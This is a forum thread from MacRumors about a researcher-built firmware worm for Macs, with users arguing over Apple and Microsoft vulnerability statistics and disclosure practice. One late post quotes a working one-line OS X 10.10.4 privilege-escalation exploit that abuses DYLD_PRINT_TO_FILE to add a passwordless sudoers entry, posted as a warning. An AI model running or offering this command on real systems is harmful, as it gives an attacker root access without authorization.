Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

First Firmware Worm Able to Infect Macs Created by Researchers

Thunderhawks said:
This is hardly the first time that people CLAIM that Apple sweeps security issues under the rug etc.

You know as little or as much as anybody....
Click to expand...

Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.

OS-chart.jpg


http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.
 
Ha! I use a Hackintosh which uses UEFI bios that are foreign to this worm. There is no firmware in my case. I'm all safe!
 
macUser2007 said:
Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.

http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.
Click to expand...

Hmm but all OS X versions are bundled together whereas Windows are split between versions, doesn't seem a very honest way of reporting. The CVSS Scores report also tells a different story. Across Microsofts products for the last year there are 513 vulnerabilities vs. 398 for Apple. The weighted average score (where higher is worse) is also higher for Microsoft; 8.4 vs. 7 for Apple.


CVSS Scores for Apple http://www.cvedetails.com/cvss-score-charts.php?vendor=Apple&vendor_id=49&fromform=1

CVSS Scores for MS http://www.cvedetails.com/cvss-score-charts.php?vendor=Microsoft&vendor_id=26&fromform=1

Finally Google is being disingenuous in the extreme, it's not like Android doesn't have it's own vulnerabilities.
 
  • Like
Reactions: Artimus12, Roadstar, Benjamin Frost and 2 others
pdaholic said:
Thank goodness these "researchers" are on our side.
Click to expand...

And then there are the others that have the same knowledge that are not on our side.

maxsix said:
Apple enthusiasts busy defending Apple, while living in complete denial about the risks, are just what Apple counts on, so they can push security down their list of priorities.
Click to expand...

Well, in Apple's defense, they've been selling that illusion for three decades and naturally cannot publicly say that their products are not in the least more secure than those of their competitors...

SoyCapitanSoyCapitan said:
Just sandbox all browsers and implement a thorough scan of anything downloading. Sandboxing the user folders would also help. Access to system folders should require a password.
Click to expand...

Sorry, but none of this would protect you against this kind of attack.
 
Last edited by a moderator:
  • Like
Reactions: H2SO4
CaTOAGU said:
Hmm but all OS X versions are bundled together whereas Windows are split between versions, doesn't seem a very honest way of reporting. The CVSS Scores report also tells a different story. Across Microsofts products for the last year there are 513 vulnerabilities vs. 398 for Apple. The weighted average score (where higher is worse) is also higher for Microsoft; 8.4 vs. 7 for Apple.


CVSS Scores for Apple http://www.cvedetails.com/cvss-score-charts.php?vendor=Apple&vendor_id=49&fromform=1

CVSS Scores for MS http://www.cvedetails.com/cvss-score-charts.php?vendor=Microsoft&vendor_id=26&fromform=1

Finally Google is being disingenuous in the extreme, it's not like Android doesn't have it's own vulnerabilities.
Click to expand...
You know what. It’s just beginning.
I fear the next few years are going to be a rough ride for us Mac users. Probably just as rough for Tim cook - maybe he and Jony are hoping that only the most slimmed down of code can get in.

I think in that next Keynote Tim will tell us about a new feature for easy firmware updates……….
 
H2SO4 said:
You know what. It’s just beginning.
I fear the next few years are going to be a rough ride for us Mac users.
Click to expand...

Vulnerabilities are increasing and attacks getting more sophisticated across all platforms. Partly, I expect, because OS's and applications are getting more complex, with increased complexity comes increased errors.

Hackers have the easier job though; they can spend all their time looking for vulnerabilities and they only have to succeed once to have won. OS designers and coders have to succeed all the time. All their code must be correct, exceptions handled, bounds and memory allocation correct etc. All the time! It's no small task and humans will always make mistakes.

What really matters is how vendors respond when something is discovered. This is where I think Apple could stand to improve, partly with communication and partly with response time.
 
  • Like
Reactions: neeklamy and djang0
tennisproha said:
Thats like saying we're gonna continue to let criminals murder and rape people until we have better law enforcement. We know thats not the answer, prevention is. Its an idiotic mindset.
Click to expand...

Yep, a security researcher disclosing a vulnerability in a computer is *exactly* like society condoning the rape and murder of its citizens in order to make the police look bad. o_O:confused::rolleyes:o_O
 
CaTOAGU said:
Vulnerabilities are increasing and attacks getting more sophisticated across all platforms. Partly, I expect, because OS's and applications are getting more complex, with increased complexity comes increased errors.
Click to expand...

The attacks are becoming more sophisticated because software makers are being more sophisticated in securing their products - most of the low-hanging fruit (security flaws) have already been picked.
 
  • Like
Reactions: CaTOAGU
macduke said:
Of all the alleged Mac "hacks" that have surfaced over the years, this is the only one that has seemed to be a legitimate concern to me. The other hacks usually required direct access to your computer or installing some shady torrent software after putting in an admin password. This thing can be remotely installed from a website and can't be wiped. Sure, don't visit a shady website you say. But if a web server is compromised in some other way and this hack is installed, you could get it from nearly anywhere. This is bad.
Click to expand...

I think the XARA Keychain vulnerability (https://www.macrumors.com/2015/06/17/ios-osx-cross-app-keychain-security-flaw/) is still pretty high in the list of concerning security issues too.

And so is the latest privilege-escalation bug as well (http://arstechnica.com/security/201...-x-comes-under-active-exploit-to-hijack-macs/).

So that makes it more like 3 serious potential hacks as of late, at the very least.
 
Tucom said:
Is there a list of Macs known to be susceptible to this, or is it all of them? I was looking at (eventually) getting a new iMac, but now not so sure.

And before any fanboys share their "0.2" - I take security very seriously, and while I love Apple, I'm not going to invest in such an expensive machine with doors like this wide open.
Click to expand...

There are problems with PCs too. Some serious, some not. Remember the Lenovo Superfish issue? Windows 10 is new, but there will be a lot of bad malware for it too.

What would you get other than a Mac? Standard Windows PC will have exploits too. It is still safer to use a Mac.

Also, let's not forget that Windows 10 (even though I love it better than 7 or 8) tracks everything you do (records what you type) by default. So are you going to Linux then?
 
macUser2007 said:
Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.

View attachment 572861

http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.
Click to expand...

Oh please. Where is Windows XP? Why is each Windows version separate? Where is Android with that massive MMS flaw that 950 million devices are vulnerable to? Most of which the carriers and vendors will NOT update.

There was a major flaw in the font system in all recent Windows version including Windows XP. But they did NOT patch Windows XP.
 
  • Like
Reactions: linuxcooldude
mazz0 said:
Two questions:

1. Anybody else find that bloke hard to understand? He seems to speak quite quickly, while slightly slurring his words. Might not be an issue if you're familiar with the accent, but a foreign accent plus poor articulation makes it a bit tricky at times.
Click to expand...

Seeing "bloke" and "foreign accent" in the same sentence tickled me. You know because I'm an American and think the world revolves around the US.

Obviously, your point and terminology was completely accurate, it just make me smile for some reason. ;-)
 
Geekazoid said:
I apologise for going off topic, but I just have to mention that I like your avatar @macduke. :)

Did you create it yourself? :)
Click to expand...
Thanks. Yes I did. I put my username where the serial number should go to fill up some space. Since the forum redesign with the circular avatars happened around the same time that my Apple Watch arrived and the iOS 9 beta was unveiled, I was inspired to mash it all together. I briefly tried one with the El Cap background but it didn't look as good.

iOS style blurs are pretty easy to do in Photoshop. Take a copy of your layer and put a mask on it of whatever shape you want. Then run Blur Gallery > Field Blur on it with a radius of around 50px. Then put a brightness/contrast adjustment layer with a clipping mask on top of that layer. Lower the contrast around 20% and then adjust the brightness until it looks about right.
 
djang0 said:
I think the XARA Keychain vulnerability (https://www.macrumors.com/2015/06/17/ios-osx-cross-app-keychain-security-flaw/) is still pretty high in the list of concerning security issues too.

And so is the latest privilege-escalation bug as well (http://arstechnica.com/security/201...-x-comes-under-active-exploit-to-hijack-macs/).

So that makes it more like 3 serious potential hacks as of late, at the very least.
Click to expand...
Yikes. Perhaps 10.12 should be the big security update? I mean patch what needs to be patched now but overhaul everything later on.
 
macUser2007 said:
Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.

View attachment 572861

http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.
Click to expand...

All of that will keep on going for all platforms.

As others wrote, not really an honest listing, buy I'll take your word for it.

It is debatable whether Apple should respond or just quietly fix.
What is the difference between saying:

We are working on it, taking it seriously etc.etc. and saying nothing?

I would bet my life on it that if they find something totally serious that they will work on it and not ignore it.

It's just that nothing is immediate. It's a process that requires time.
 
xWhiplash said:
There are problems with PCs too. Some serious, some not. Remember the Lenovo Superfish issue? Windows 10 is new, but there will be a lot of bad malware for it too.

What would you get other than a Mac? Standard Windows PC will have exploits too. It is still safer to use a Mac.

Also, let's not forget that Windows 10 (even though I love it better than 7 or 8) tracks everything you do (records what you type) by default. So are you going to Linux then?
Click to expand...

To be honest I was looking at the new HP Pavilion 23 2015. Looks super clean like an iMac (yes I know it's an iMac copy, but in all the right ways). If HP is using cryptographic firmware like Dell and Lenovo then it very well could be safer in this category than any susceptible Mac out there.

I'll probably give it a few weeks, but if there's no word of Apple even lifting a finger about this, I may reconsider my next machine purchase.
 
mrcobra92 said:
Ha! I use a Hackintosh which uses UEFI bios that are foreign to this worm. There is no firmware in my case. I'm all safe!
Click to expand...
If you are using OS X 10.10.4 you are susceptible to the 0-day privilege-escalation bug that this firmware worm is using to infect the system without asking for a password:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp

http://arstechnica.com/security/201...-x-comes-under-active-exploit-to-hijack-macs/
 
RogerWilco said:
Maybe, maybe not. A guy walks up to a convenience charging station in the gate area at ATL. His MacBook (with one, universal port) is pre-infected (intentionally?) with this malware. It transfers to the Thunderbolt/USB-C at the charging station. Now every subsequent user of that charging station will be infected. The same could happen at libraries, A/V presentation situations ("oh you forgot your cable, here borrow this one..."), etc.

The only real fix is to trash all existing Thunderbolt peripherals and cables and replace them with updated, more secure versions. How likely is that?
Click to expand...

This is a Thunderbolt exploit. The Macbook with USB-C doesn't even HAVE Thunderbolt. If your Mac does have Thunderbolt it's not used for charging, so why would there be a Thunderbolt port in a public charging station?

Your example is a poor one.
 
You must log in or register to reply here.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back